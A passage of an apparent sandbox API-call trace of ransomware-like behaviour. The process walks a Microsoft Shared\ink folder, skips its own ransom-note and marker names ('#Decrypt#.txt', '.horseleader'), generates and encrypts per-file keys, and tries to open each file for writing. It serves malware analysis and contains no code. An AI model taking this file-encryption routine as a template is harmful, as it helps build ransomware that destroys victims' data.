nFileSizeLow=0x800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0234.164] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="Windows") returned -1 [0234.164] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll") returned 73 [0234.164] StrStrIW (lpFirst="IPSEventLogMsg.dll", lpSrch=".horseleader") returned 0x0 [0234.164] lstrcmpW (lpString1="IPSEventLogMsg.dll", lpString2="#Decrypt#.txt") returned 1 [0234.164] lstrcmpW (lpString1="IPSEventLogMsg.dll", lpString2="_uninstalling_.png") returned 1 [0234.164] lstrlenW (lpString=".testttjffg") returned 11 [0234.164] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll", lpSrch=".testttjffg") returned 0x0 [0234.164] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.164] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.165] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0234.165] lstrcmpiW (lpString1="ipsfin.xml", lpString2="Windows") returned -1 [0234.165] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 65 [0234.165] StrStrIW (lpFirst="ipsfin.xml", lpSrch=".horseleader") returned 0x0 [0234.165] lstrcmpW (lpString1="ipsfin.xml", lpString2="#Decrypt#.txt") returned 1 [0234.165] lstrcmpW (lpString1="ipsfin.xml", lpString2="_uninstalling_.png") returned 1 [0234.165] lstrlenW (lpString=".testttjffg") returned 11 [0234.165] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpSrch=".testttjffg") returned 0x0 [0234.165] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.165] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.165] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0234.166] lstrcmpiW (lpString1="ipsfra.xml", lpString2="Windows") returned -1 [0234.166] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 65 [0234.166] StrStrIW (lpFirst="ipsfra.xml", lpSrch=".horseleader") returned 0x0 [0234.166] lstrcmpW (lpString1="ipsfra.xml", lpString2="#Decrypt#.txt") returned 1 [0234.166] lstrcmpW (lpString1="ipsfra.xml", lpString2="_uninstalling_.png") returned 1 [0234.166] lstrlenW (lpString=".testttjffg") returned 11 [0234.166] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpSrch=".testttjffg") returned 0x0 [0234.166] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.166] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.166] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.171] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0234.171] lstrcmpiW (lpString1="ipshrv.xml", lpString2="Windows") returned -1 [0234.171] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 65 [0234.171] StrStrIW (lpFirst="ipshrv.xml", lpSrch=".horseleader") returned 0x0 [0234.171] lstrcmpW (lpString1="ipshrv.xml", lpString2="#Decrypt#.txt") returned 1 [0234.171] lstrcmpW (lpString1="ipshrv.xml", lpString2="_uninstalling_.png") returned 1 [0234.171] lstrlenW (lpString=".testttjffg") returned 11 [0234.171] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpSrch=".testttjffg") returned 0x0 [0234.171] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.171] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.172] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0234.172] lstrcmpiW (lpString1="ipsita.xml", lpString2="Windows") returned -1 [0234.172] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 65 [0234.172] StrStrIW (lpFirst="ipsita.xml", lpSrch=".horseleader") returned 0x0 [0234.172] lstrcmpW (lpString1="ipsita.xml", lpString2="#Decrypt#.txt") returned 1 [0234.172] lstrcmpW (lpString1="ipsita.xml", lpString2="_uninstalling_.png") returned 1 [0234.172] lstrlenW (lpString=".testttjffg") returned 11 [0234.172] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpSrch=".testttjffg") returned 0x0 [0234.172] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.172] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.172] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0234.173] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="Windows") returned -1 [0234.173] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 65 [0234.173] StrStrIW (lpFirst="ipsjpn.xml", lpSrch=".horseleader") returned 0x0 [0234.173] lstrcmpW (lpString1="ipsjpn.xml", lpString2="#Decrypt#.txt") returned 1 [0234.173] lstrcmpW (lpString1="ipsjpn.xml", lpString2="_uninstalling_.png") returned 1 [0234.173] lstrlenW (lpString=".testttjffg") returned 11 [0234.173] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpSrch=".testttjffg") returned 0x0 [0234.173] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.173] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.173] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.173] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0234.173] lstrcmpiW (lpString1="ipskor.xml", lpString2="Windows") returned -1 [0234.173] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 65 [0234.174] StrStrIW (lpFirst="ipskor.xml", lpSrch=".horseleader") returned 0x0 [0234.174] lstrcmpW (lpString1="ipskor.xml", lpString2="#Decrypt#.txt") returned 1 [0234.174] lstrcmpW (lpString1="ipskor.xml", lpString2="_uninstalling_.png") returned 1 [0234.174] lstrlenW (lpString=".testttjffg") returned 11 [0234.174] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpSrch=".testttjffg") returned 0x0 [0234.174] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.174] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.174] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.175] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dc49d13, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5dc49d13, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0234.175] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="Windows") returned -1 [0234.175] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll") returned 77 [0234.175] StrStrIW (lpFirst="IpsMigrationPlugin.dll", lpSrch=".horseleader") returned 0x0 [0234.175] lstrcmpW (lpString1="IpsMigrationPlugin.dll", lpString2="#Decrypt#.txt") returned 1 [0234.175] lstrcmpW (lpString1="IpsMigrationPlugin.dll", lpString2="_uninstalling_.png") returned 1 [0234.175] lstrlenW (lpString=".testttjffg") returned 11 [0234.175] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll", lpSrch=".testttjffg") returned 0x0 [0234.175] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.176] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.176] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0234.176] lstrcmpiW (lpString1="ipsnld.xml", lpString2="Windows") returned -1 [0234.176] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 65 [0234.176] StrStrIW (lpFirst="ipsnld.xml", lpSrch=".horseleader") returned 0x0 [0234.176] lstrcmpW (lpString1="ipsnld.xml", lpString2="#Decrypt#.txt") returned 1 [0234.176] lstrcmpW (lpString1="ipsnld.xml", lpString2="_uninstalling_.png") returned 1 [0234.176] lstrlenW (lpString=".testttjffg") returned 11 [0234.176] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpSrch=".testttjffg") returned 0x0 [0234.176] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.176] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.177] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0234.177] lstrcmpiW (lpString1="ipsnor.xml", lpString2="Windows") returned -1 [0234.177] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 65 [0234.177] StrStrIW (lpFirst="ipsnor.xml", lpSrch=".horseleader") returned 0x0 [0234.177] lstrcmpW (lpString1="ipsnor.xml", lpString2="#Decrypt#.txt") returned 1 [0234.177] lstrcmpW (lpString1="ipsnor.xml", lpString2="_uninstalling_.png") returned 1 [0234.177] lstrlenW (lpString=".testttjffg") returned 11 [0234.177] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpSrch=".testttjffg") returned 0x0 [0234.177] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.177] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.177] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.177] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0234.177] lstrcmpiW (lpString1="ipsplk.xml", lpString2="Windows") returned -1 [0234.178] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 65 [0234.178] StrStrIW (lpFirst="ipsplk.xml", lpSrch=".horseleader") returned 0x0 [0234.178] lstrcmpW (lpString1="ipsplk.xml", lpString2="#Decrypt#.txt") returned 1 [0234.178] lstrcmpW (lpString1="ipsplk.xml", lpString2="_uninstalling_.png") returned 1 [0234.178] lstrlenW (lpString=".testttjffg") returned 11 [0234.178] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpSrch=".testttjffg") returned 0x0 [0234.178] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.178] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.179] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63de1b63, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x63de1b63, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a991650, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0234.179] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="Windows") returned -1 [0234.179] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 68 [0234.179] StrStrIW (lpFirst="IpsPlugin.dll", lpSrch=".horseleader") returned 0x0 [0234.179] lstrcmpW (lpString1="IpsPlugin.dll", lpString2="#Decrypt#.txt") returned 1 [0234.179] lstrcmpW (lpString1="IpsPlugin.dll", lpString2="_uninstalling_.png") returned 1 [0234.179] lstrlenW (lpString=".testttjffg") returned 11 [0234.179] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll", lpSrch=".testttjffg") returned 0x0 [0234.179] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.180] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.180] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0234.180] lstrcmpiW (lpString1="ipsptb.xml", lpString2="Windows") returned -1 [0234.180] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 65 [0234.180] StrStrIW (lpFirst="ipsptb.xml", lpSrch=".horseleader") returned 0x0 [0234.180] lstrcmpW (lpString1="ipsptb.xml", lpString2="#Decrypt#.txt") returned 1 [0234.180] lstrcmpW (lpString1="ipsptb.xml", lpString2="_uninstalling_.png") returned 1 [0234.180] lstrlenW (lpString=".testttjffg") returned 11 [0234.180] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpSrch=".testttjffg") returned 0x0 [0234.180] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.180] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.181] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, 